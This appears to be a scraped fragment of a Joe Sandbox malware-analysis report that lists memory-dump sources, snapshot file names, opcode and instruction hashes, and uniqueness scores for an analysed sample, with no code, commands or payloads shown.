                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8438c015c52e1b6031cde9a6d2846b8b356d76e03c2207551169d1af1233ff7f
                                                                                                                                                                                                                                                  • Instruction ID: 678f3561ae53759d244856a15c01a74fd803d39ed21958e0ec490e16de427213
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8438c015c52e1b6031cde9a6d2846b8b356d76e03c2207551169d1af1233ff7f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF01D72E00118ABCB05DB99DC05AFEBBFAEFC8611F04802AE619E3240D7705A159B90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c8677fe5550eb9d0d8d59ab1e4eb752e61ee283554c4e6527037ac6335ad14a6
                                                                                                                                                                                                                                                  • Instruction ID: 214d1ffe64fa976fad1589c8a093a4881d653fa850527c34a8284e23e36bc3be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8677fe5550eb9d0d8d59ab1e4eb752e61ee283554c4e6527037ac6335ad14a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF0F8757142249B4B549A1DE89896FBBEEEBC86A1314812AF909C7344DF71EC0287A4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_6630000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_6630000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: dcd843cb5434ee3908cbd240b558e8484296863051367d7a40a96a16c53c0f1c
                                                                                                                                                                                                                                                  • Instruction ID: bc5a466b8a0eefd40e2f9fc9210961a041f404015f21907d3422cac1940a93af
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcd843cb5434ee3908cbd240b558e8484296863051367d7a40a96a16c53c0f1c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E06D3090464ACFDB50DF50C5059ADBFF4AF49340F11060AE8069A201CF710A82CFE1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ae12b6dd21de4c2fd9613e84c39108f4a5b54078bca241ca2f0deefb0eb5f856
                                                                                                                                                                                                                                                  • Instruction ID: 55a7715872263b1d5ef833e6c4631e318d55185870f84caba72e3e8a489b5a98
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae12b6dd21de4c2fd9613e84c39108f4a5b54078bca241ca2f0deefb0eb5f856
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7E0C232A092905FCB159B767C098EABF359DC222170A41FBE548CB043DB204929D7A6
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 56444ee234dc8209750c4e659ed3cc1299eaad842c29aec23fdf420b8574e844
                                                                                                                                                                                                                                                  • Instruction ID: fa54d9210e9de3a3f209c6124f26d52949bce4735f2e3fc09827e495212a7f09
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56444ee234dc8209750c4e659ed3cc1299eaad842c29aec23fdf420b8574e844
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E07231B0820883C3016228AA142C93322EB80258F8540A9D685AB381FB3A9C2983C1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14ce1f8e74441e6493145ce2788f568d0e5d49b3619122173fb3bc6b0a389dd1
                                                                                                                                                                                                                                                  • Instruction ID: 28f8811f878f0b782d591747e5bc9dcc308375c9255ed8a9a7a17897af662800
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14ce1f8e74441e6493145ce2788f568d0e5d49b3619122173fb3bc6b0a389dd1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00D012227712360616D077FB2D111FF73CDA9C107578940B2EA5CC2586ED05C85162D0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b763563f34e72c91e01b9439146bf6f143571ae552d24d314c1d378a39b202c4
                                                                                                                                                                                                                                                  • Instruction ID: c9eedcac8421b723693dd6852bd3b2c26ade88c409c8085ee881c5c4405ab815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b763563f34e72c91e01b9439146bf6f143571ae552d24d314c1d378a39b202c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD01231206115CB87142FB4F808469B76AEE85256300407AFD0AD2741DF79DC14D791
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b2a14441d15d691b855c6a4605df0a770da5fb15632c95a96cbc666b8f96071
                                                                                                                                                                                                                                                  • Instruction ID: 9de4e4460267b81049119f941405867a9f32d24d53cd3ed88260e222f15e2d18
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b2a14441d15d691b855c6a4605df0a770da5fb15632c95a96cbc666b8f96071
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEE0EC35211704CFC318DF69D048C96B7EAFF8926135184A9E91AC7720DB31EC00CB90
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cc9b86cb2b62fc7eff34887c048636a4d03750669c3ab73e0c427414b808dd04
                                                                                                                                                                                                                                                  • Instruction ID: 1f8b02e04c5e84dbb93bf8143e55acb99fb1a067a8fee4d5018baab0ba1b6395
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc9b86cb2b62fc7eff34887c048636a4d03750669c3ab73e0c427414b808dd04
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DD022306493846FD3420BA0BC14EB73F2EDB82322B0401A6FA16C6292DA184818E2B2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
Uniqueness Score: -1.00%